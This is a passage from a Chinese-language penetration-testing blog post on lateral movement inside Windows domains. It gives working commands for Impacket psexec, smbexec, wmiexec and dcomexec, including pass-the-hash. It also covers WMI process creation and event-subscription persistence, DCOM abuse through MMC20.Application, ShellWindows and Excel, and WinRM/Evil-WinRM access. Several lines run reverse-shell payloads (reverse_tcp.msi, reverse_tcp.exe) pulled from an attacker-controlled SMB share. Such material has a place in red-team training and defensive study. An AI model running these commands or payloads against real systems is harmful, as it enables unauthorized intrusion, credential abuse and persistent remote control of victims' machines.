<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python psexec.py domain/user:password@ip</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">哈希传递</span></span><br><span class="line">python3 psexec.py domain/user@ip -hashes :93b95aef15f4d50fab96ffc44a2f326a</span><br></pre></td></tr></table></figure>


<h3 id="SMBExec"><a href="#SMBExec" class="headerlink" title="SMBExec"></a>SMBExec</h3><p>SMBExec 与 PSExec 非常相似，但是，SMBExec 不会将二进制文件放入磁盘。SMBExec 利用一个批处理文件和一个临时文件来执行和转发消息。</p>
<p>与 PSExec 一样，SMBExec 通过 SMB 协议 (445&#x2F;TCP) 发送输入并接收输出。</p>
<p>利用条件<br>1、远程机器的 139 或 445 端口需要开启状态，即 SMB；<br>2、开启<code>IPC$</code>和<code>C$</code>，具备将文件写入共享文件夹的权限；<br>3、能够在远程机器上创建服务<br>4、能够启动所创建的服务</p>
<p>impacket项目中实现了smbexec：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python smbexec.py domain/user:password@ip</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">哈希传递</span></span><br><span class="line">python3 smbexec.py domain/user@ip -hashes :93b95aef15f4d50fab96ffc44a2f326a</span><br></pre></td></tr></table></figure>

<p>smbexec本质依然是先建立<code>IPC$</code>共享，然后通过<code>svcctl</code>协议在目标主机创建和启动服务，不过特殊的一点在于它会将用户需要执行的命令存放在服务中的<code>ImagePath</code>属性中，正是基于这一点，每执行一次命令就需要创建一次服务，每次执行命令也会生成7045和7009两条与服务相关的系统日志记录。 </p>
<p>执行命令的过程：<br>1、首先会将命令存放进入<code>%SystemRoot%\xxxx.bat</code>文件<br>2、运行bat文件并将执行的结果储存至<code>C$</code>共享的<code>__output</code>文件中<br>3、删除bat文件<br>4、客户端通过读取目标<code>C$</code>共享的<code>__output</code>临时文件获取执行结果</p>
<h2 id="wmi的利用"><a href="#wmi的利用" class="headerlink" title="wmi的利用"></a>wmi的利用</h2><p>WMI（Windows Management Instrumentation，Windows管理规范）是一项核心的Windows管理技术。用户可以通过WMI管理本地和远程主机。</p>
<p>Windows为传输WMI数据提供了两个可用的协议：分布式组件对象模型（Distributed Component Object Model, DCOM）和Windows远程管理（Window Remote Management，WinRM）使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等操作都能远程运行。</p>
<p> 利用WMI进行横向移动需要具备以下条件：<br>1、远程主机的WMI服务为开启状态（默认开启）<br>2、远程主机防火墙放行135端口，这是WMI管理的默认端口</p>
<p>在横向移动时，可以利用WMI提供的管理功能，通过以获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。<br>目前两种常见的利用方法：<br>1、 通过调用WMI的类方法进行远程调用，如<code>Win32_Process</code>类中的<code>Create</code>方法可以在远程主机上创建进程，<code>Win32_Product</code>类的<code>Install</code>方法可以在远程主机上安装恶意的MSI<br>2、 远程部署WMI事件订阅，在特定事件发生时触发</p>
<h3 id="常规利用方法"><a href="#常规利用方法" class="headerlink" title="常规利用方法"></a>常规利用方法</h3><p>在windows上可以通过<code>wmic.exe</code>和powershell提供的cmdlet来使用WMI数据和执行WMI方法。</p>
<blockquote>
<p>wmic.exe是一个与WMI进行交互的命令行工具，拥有大量的WMI对象的默认别名，可以执行许多复杂的查询。<br>powershell也提供了许多可以与WMI进行交互的cmelet，如<code>Invoke-WmiMethod</code>、<code>Set-WmiInstance</code>等</p>
</blockquote>
<p><strong>执行远程查询</strong><br>通过WMI查询远程主机上运行的进程信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:172.77.4.100 /user:Administrator /password:Admin2016 process list brief</span><br><span class="line"><span class="meta"># </span><span class="language-bash">/node 执行远程主机的地址</span></span><br></pre></td></tr></table></figure>

<p><strong>创建远程进程</strong><br>通过调用<code>Win32_Process.Create</code>方法在远程主机上创建进程，启动CMD来执行命令</p>
<blockquote>
<p>由于WMIC在执行命令时没有回显，因此可以将执行结果写入文件，然后通过别的方式读取文件</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:172.77.4.100 /user:Administrator /password:Admin2016 process call create &quot;cmd.exe /c ipconfig &gt; C:\result.txt&quot;</span><br></pre></td></tr></table></figure>

<p><strong>远程安装MSI文件</strong><br>通过调用<code>Win32_Product.Install</code>方法，可以控制远程主机安装恶意MSI文件，从而获得权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:172.77.4.100 /user:Administrator /password:Admin2016 product call install PackageLocation=&quot;\\192.168.30.100\mysmb\reverse_tcp.msi&quot;</span><br></pre></td></tr></table></figure>

<h3 id="常见利用工具"><a href="#常见利用工具" class="headerlink" title="常见利用工具"></a>常见利用工具</h3><p><strong>WMIExec</strong></p>
<p>Impacket项目的wmiexec.py能够以全交互或半交互的方式，通过WMI在远程主机上执行命令。</p>
<p>该工具需要远程主机开启135和445端口，其中445端口用于传输命令执行的回显。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wmiexec.py dar.com/Administrator:Admin2016@172.77.4.100</span><br></pre></td></tr></table></figure>

<p>wmiexec允许通过TCP 135端口与远程过程调用(RPC)建立初始通信来远程访问机器。初始通信建立后，它会使用一个大于1024的随机端口进行协商，该连接用于向远程机器发送输入。并且，输入的内容将在cmd.exe进程中执行，输出的内容将保存在远程机器上<code>ADMIN$</code>共享的临时文件中。临时文件的文件名以<code>__</code>开头，加上当前日期和时间转换而成的时间戳（例如<code>__1685167921.750285</code>）</p>
<p><strong>WMIHacker</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/rootclay/WMIHACKER">https://github.com/rootclay/WMIHACKER</a></p>
<p>WMIHacker是一款用于远程主机连接工具，通过135端口进行命令执行，执行结果读取以及无需445端口进行文件传输。</p>
<p>执行模式包括<code>/cmd</code>、<code>/shell</code>、<code>/upload</code>、<code>/download</code>，分别指执行命令、模拟shell、上传文件、下载文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Usage:</span><br><span class="line">        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?</span><br><span class="line">        WMIHACKER.vbs  /shell  host  user  pass</span><br><span class="line">        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath</span><br><span class="line">        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath</span><br><span class="line">          /cmd          single command mode</span><br><span class="line">          host          hostname or IP address</span><br><span class="line">          GETRES?       Res Need Or Not, Use 1 Or 0</span><br><span class="line">          command       the command to run on remote host</span><br></pre></td></tr></table></figure>

<p>有命令回显执行方式</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript /nologo wmihacker.vbs /cmd 172.77.4.100 dar.com\administrator &quot;Admin2016&quot; &quot;ipconfig&quot; 1</span><br></pre></td></tr></table></figure>

<h3 id="WMI事件订阅的利用"><a href="#WMI事件订阅的利用" class="headerlink" title="WMI事件订阅的利用"></a>WMI事件订阅的利用</h3><p>WMI提供了强大的事件处理系统，几乎可以用于操作系统上发生的任何事件做出相应。</p>
<p>其中触发事件的具体条件被称为“<strong>事件过滤器</strong>”（Event Filter），如用户登录、新进程创建等；<br>对指定事件发生做出相应的称为“<strong>事件消费者</strong>”（Event Consumer），包括一系列具体的操作，如运行脚本、记录日志、发送邮件等。<br>在部署事件订阅时，需要分别构建Filter和Consumer两部分，并将两者绑定在一起。</p>
<p>所有的事件过滤器都被存储在一个<code>Root\subscription:__EventFiilter</code>对象的实例，可以通过创建<code>__EventFilter</code>对象实例来部署事件过滤器。事件消费者是基于<code>ROOT\subscription:__EventConsumer</code>系统类派生来的类。</p>
<p>系统提供了常用的标准事件消费类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">LogFileEventConsumer         # 将事件数据写入指定的日志文件</span><br><span class="line">ActiveScriptEventConsumer    # 执行嵌入的VBScript或JavaScript</span><br><span class="line">NTEventLogEventConsumer      # 创建一个包含事件数据的事件日志条目</span><br><span class="line">SMTPEventConsumer            # 发送一封包含事件数据的电子邮件</span><br><span class="line">CommandLineEventConsumer     # 执行指定的系统命令</span><br></pre></td></tr></table></figure>


<p><strong>手动利用：</strong></p>
<p>1、整合<code>PSCredential</code>，用于后续过程的认证</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$Username</span> = <span class="string">&quot;dar.com/Administrator&quot;</span></span><br><span class="line"><span class="variable">$Password</span> = <span class="string">&quot;Admin2016&quot;</span></span><br><span class="line"><span class="variable">$SecurePassword</span> = <span class="variable">$Password</span> | <span class="built_in">ConvertTo-SecureString</span> <span class="literal">-AsPlainText</span> <span class="literal">-Force</span></span><br><span class="line"><span class="variable">$Credential</span> = <span class="built_in">New-Object</span> <span class="literal">-TypeName</span> System.Management.Automation.PSCredential <span class="literal">-ArgumentList</span> <span class="variable">$Username</span>, <span class="variable">$SecurePassword</span></span><br></pre></td></tr></table></figure>

<p>2、设置攻击目标和其他公共参数</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$GlobalArgs</span> = <span class="selector-tag">@</span>&#123;</span><br><span class="line">    Credential = <span class="variable">$Credential</span></span><br><span class="line">    ComputerName = <span class="string">&quot;172.77.4.100&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>3、在远程主机上部署<code>TestFilter</code>事件过滤器，用于查询svchost.exe进程的产生。由于WMI所有事件过滤器都存储于<code>Root\subscription:__EventFilter</code>对象的实例，因此通过<code>Set-WmiInstance</code>Cmdlet创建一个<code>__EventFilter</code>类的实例即可</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$EventFilterArgs</span> = <span class="selector-tag">@</span>&#123;</span><br><span class="line">    EventNamespace = <span class="string">&quot;root/cimv2&quot;</span></span><br><span class="line">    Name = <span class="string">&quot;TestFilter&quot;</span></span><br><span class="line">    Query = <span class="string">&quot;Select * from Win32_ProcessStartTrace where processname = &#x27;svchost.exe&#x27;&quot;</span></span><br><span class="line">    QueryLanguage = <span class="string">&quot;WQL&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$EventFilter</span> = <span class="built_in">Set-WmiInstance</span> <span class="literal">-Namespace</span> root\subscription <span class="literal">-Class</span> __EventFilter <span class="literal">-Arguments</span> <span class="variable">$EventFilterArgs</span> @GlobalArgs</span><br></pre></td></tr></table></figure>

<p>4、在远程主机上部署一个名为<code>TestConsumer</code>的事件消费者，创建事件消费类<code>CommandLineEventConsumer</code>的实例，在指定事件发生时执行系统命令</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$CommandLinEventConsumerArgs</span> = <span class="selector-tag">@</span>&#123;</span><br><span class="line">    Name = <span class="string">&quot;TestConsumer&quot;</span></span><br><span class="line">    CommandLineTemplate = <span class="string">&quot;C:\Windows\System32\cmd.exe /c calc.exe&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$EventConsumer</span> = <span class="built_in">Set-WmiInstance</span> <span class="literal">-Namespace</span> root\subscription <span class="literal">-Class</span> CommandLineEventConsumer <span class="literal">-Arguments</span> <span class="variable">$CommandLineEventConsumerArgs</span> @GlobalArgs</span><br></pre></td></tr></table></figure>

<p>5、将创建的事件过滤器和事件消费者绑定在一起</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$FilterConsumerBindingArgs</span> = <span class="selector-tag">@</span>&#123;</span><br><span class="line">    <span class="keyword">Filter</span> = <span class="variable">$EventFilter</span></span><br><span class="line">    Consumer = <span class="variable">$EventConsumer</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$FilterConsumerBinding</span> = <span class="built_in">Set-WmiInstance</span> <span class="literal">-Namespace</span> root\subscription <span class="literal">-Class</span> __FilterToConsumerBinding <span class="literal">-Arguments</span> <span class="variable">$FilterConsumerBindingargs</span> @GlobalArgs</span><br></pre></td></tr></table></figure>

<p><strong>Sharp-WMIEvent</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/wh0Nsq/Sharp-WMIEvent">https://github.com/wh0Nsq/Sharp-WMIEvent</a></p>
<p>在远程主机上部署一个随即命名的永久事件订阅，并每隔60s执行以此SMB共享中的攻击载荷</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sharp-WMIEvent -Trigger Interval -IntervalPeriod 60 -ComputerName 172.77.4.400 -Domain dar.com -Username Administrator -Password Admin2016 -Command &quot;cmd.exe /c &#x27;ipconfig &gt; c:\a.txt&#x27;&quot;</span><br></pre></td></tr></table></figure>



<h2 id="DCOM的利用"><a href="#DCOM的利用" class="headerlink" title="DCOM的利用"></a>DCOM的利用</h2><p>COM（Component Object Model，组件对象模型）是微软的一套软件组成的二进制接口标准，使得跨编程语言的进程间通信、动态对象创建成为可能。</p>
<p>COM指定了一个对象模型和编程要求，使COM对象能够与其他对象交互。这些对象可以在单个进程中，也可以在其它进程中，甚至可以在远程计算机中。在Windows中，每个COM对象都由唯一的128位的二进制标识符标识，即GUID。</p>
<p>DCOM（Distracted Component Model，分布式组件对象模型）是基于COM的一系列概念和程序接口，支持不同机器上的组件间通信。利用DCOM，客户端程序对象可以请求来自网络中另一台计算机上的服务器程序对象。</p>
<p>部分DCOM组件公开的接口中可能包含不安全的方法。执行以下命令，可以列出计算机上所有的DCOM程序组件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-CimInstance</span> Win32_DCOMApplication</span><br></pre></td></tr></table></figure>


<p>目前常利用的DCOM组件有：<code>MMC20.Application</code>、<code>ShellWindows</code>、<code>Excel.Application</code>、<code>ShellBrowserWindow</code>等。</p>
<p>使用DCOM在远程主机上面执行命令，需要具有以下条件：<br>1、具有管理员权限的PowerShell<br>2、可能需要关闭目标系统的防火墙。<br>3、在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户</p>
<h3 id="MMC20-Application"><a href="#MMC20-Application" class="headerlink" title="MMC20.Application"></a>MMC20.Application</h3><p><code>MMC20.Application</code>对象的<code>Document.ActiveView</code>下存在一个ExecuteShellCommand方法，可以用来启动子进程并运行执行的程序或系统命令。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过progID与DCOM进行远程交互，并创建MMC20.Application对象的示例</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromProgID(<span class="string">&quot;MMC20.Application&quot;</span>,<span class="string">&quot;172.77.4.100&quot;</span>))</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">调用ExecuteShellCommand方法启动进程，运行攻击载荷</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.Document.ActiveView.ExecuteShellCommand(<span class="string">&#x27;cmd.exe&#x27;</span>,<span class="variable">$null</span>,<span class="string">&quot;/c \\192.168.207.152\mysmb\reverse_tcp.exe&quot;</span>, <span class="string">&quot;Minimized&quot;</span>)</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">合并一句话</span></span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;172.77.4.134&quot;)).Document.ActiveView.ExecuteShellCommand(&#x27;cmd.exe&#x27;,$null,&quot;/c ipconfig &gt; c:\\b.txt&quot;, &quot;Minimized&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="ShellWindows"><a href="#ShellWindows" class="headerlink" title="ShellWindows"></a>ShellWindows</h3><p><code>ShellWindows</code>组件提供了<code>Document.Application.ShellExecute</code>方法，适用于Windows7及以上的系统。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建ShellWindows对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com=[Activator]::CreateInstance([Type]::GetTypeFromCLSID(<span class="string">&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;</span>,<span class="string">&quot;172.77.4.100&quot;</span>))</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">然后执行如下命令，我们就可以调用该对象的<span class="string">&quot;ShellExecute&quot;</span>方法在远程主机上启动进程:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.item().Document.Application.ShellExecute(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>,<span class="string">&quot;c:\windows\system32&quot;</span>,<span class="variable">$null</span>,0)</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">完整的命令:</span></span><br><span class="line">[Activator]::CreateInstance([Type]::GetTypeFromCLSID(&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;,&quot;172.77.4.100&quot;)).item().Document.Application.ShellExecute(&quot;cmd.exe&quot;,&quot;/c C:\shell.exe&quot;,&quot;c:\windows\system32&quot;,$null,0)</span><br></pre></td></tr></table></figure>

<h3 id="Excel-Application"><a href="#Excel-Application" class="headerlink" title="Excel.Application"></a>Excel.Application</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromprogID(<span class="string">&quot;Excel.Application&quot;</span>,<span class="string">&quot;172.77.4.100&quot;</span>))</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.DisplayAlerts = <span class="variable">$false</span></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">然后执行如下命令，我们就可以调用该对象的<span class="string">&quot;DDEInitiate&quot;</span>方法在远程主机上启动进程:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.DDEInitiate(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>)</span></span><br></pre></td></tr></table></figure>

<h3 id="ShellBrowserWindow"><a href="#ShellBrowserWindow" class="headerlink" title="ShellBrowserWindow"></a>ShellBrowserWindow</h3><p>使用条件：适用于Windows 10和Windows Server 2012 R2等版本的系统。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromCLSID(<span class="string">&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;</span>,<span class="string">&quot;172.77.4.100&quot;</span>))</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">然后执行如下命令，我们就可以调用该对象的<span class="string">&quot;shellExecute&quot;</span>方法在远程主机上启动进程:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.Document.Application.shellExecute(<span class="string">&quot;C:\shell.exe&quot;</span>)</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">完整的命令:</span></span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromCLSID(&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;,&quot;172.77.4.100&quot;)).Document.Application.shellExecute(&quot;C:\shell.exe&quot;)</span><br></pre></td></tr></table></figure>


<h3 id="Impacket里的dcomexec-py脚本"><a href="#Impacket里的dcomexec-py脚本" class="headerlink" title="Impacket里的dcomexec.py脚本"></a>Impacket里的dcomexec.py脚本</h3><p>Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell，但使用的是DCOM，目前支持<code>MMC20.Application，ShellWindows和ShellBrowserWindow</code>对象。</p>
<p>命令格式如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./dcomexec.py domain/username:password@ip</span><br><span class="line">./dcomexec.py domain/username:password@ip &lt;command&gt;</span><br></pre></td></tr></table></figure>


<h2 id="WinRM的利用"><a href="#WinRM的利用" class="headerlink" title="WinRM的利用"></a>WinRM的利用</h2><p> WinRM是通过执行<code>WS-Management</code>协议（用于远程软件和硬件管理的Web服务协议）来实现远程管理的，允许处于一个共同网络内的Windows计算机彼此之间互相访问和交换信息，对应的端口是<strong>5985</strong>。</p>
<p>在一台计算机启用WinRM服务后，防火墙会自动放行其相关通信端口，在另一台计算机便能通过WinRM对其进行远程管理了。</p>
<p>只有在Windows Server 2008以上版本的服务器中，WinRm服务才会<strong>自动启动</strong>。</p>
<p>在利用WinRM进行横向移动时，需要拥有远程主机的<strong>管理员凭据信息</strong>。</p>
<h3 id="通过WinRM执行远程命令"><a href="#通过WinRM执行远程命令" class="headerlink" title="通过WinRM执行远程命令"></a>通过WinRM执行远程命令</h3><p>Windows远程管理提供了两个工具：<br>① Winrs，允许远程执行命令的命令行工具，利用了WS-Manage协议<br>② Winrm（Winrm.cmd)，内置系统管理命令行工具，允许管理员配置本机的WinRM服务。</p>
<p>在默认情况下，无法通过WinRM连接到目标系统。可能出现错误：Winrs error：WinRM客户端无法处理该请求。可以将默认身份验证与IP地址结合使用：<br>① 传输为HTTPS或目标位于TrustedHosts列表中，并且提供显式凭据<br>② 使用Winrm.cmd配置TrustedHosts。</p>
<p>执行以下命令，将目标地址添加到TrustedHosts中：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">winrm set winrm/config/client @&#123;TrustedHosts=&quot;172.77.4.100&quot;&#125;</span><br><span class="line"></span><br><span class="line">set-Item WSMan:localhost\client\trustedhosts -value *    # 通过powershell，信任所有主机</span><br></pre></td></tr></table></figure>


<p><strong>Winrs</strong><br>winrs是Windows上远程管理提供的客户端程序，允许通过提供的用户凭据，在运行WinRM的服务器上执行命令。要求通信双方都安装了WinRM服务。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">执行系统命令</span></span><br><span class="line">winrs -r:http://172.77.4.100:5985 -u:Administrator -p:Admin2016 &quot;whoami&quot;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">获取远程交互式命令行</span></span><br><span class="line">winrs -r:http://172.77.4.100:5985 -u:Administrator -p:Admin2016 &quot;cmd&quot;</span><br></pre></td></tr></table></figure>

<p><strong>Winrm.cmd</strong><br>winrm.cmd允许WMI对象通过WinRm传输进行远程交互，在本地或远程计算机上枚举WMI对象实例或调用WMI类方法。比如可以通过调用Win32_Process类的Create方法来创建远程实例。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck @&#123;commandline=&quot;notepad.exe&quot;&#125; -r:http://192.168.30.100:5985 -u:Administrator -p:Admin2012</span><br></pre></td></tr></table></figure>

<h3 id="Evil-Winrm"><a href="#Evil-Winrm" class="headerlink" title="Evil-Winrm"></a>Evil-Winrm</h3><p>Evil-Winrm是基于WinRM Shell的渗透框架，可通过提供的用户名和密码或用户哈希在启动了WinRm服务的目标主机上完成简单的攻击任务。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 172.77.4.100 -u Administrator -p Admin2016</span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2023/05/10/内网渗透/横向移动/">http://dar1in9s.github.io/2023/05/10/内网渗透/横向移动/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/09/12/%E6%8C%96%E6%B4%9E/emlog/"><i class="fa fa-chevron-left">  </i><span>emlog V2.1.15 反序列化字符逃逸漏洞的详细分析（CVE-2023-43291）</span></a></div><div class="next-post pull-right"><a href="/2023/05/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB/"><span>委派攻击</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2024 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
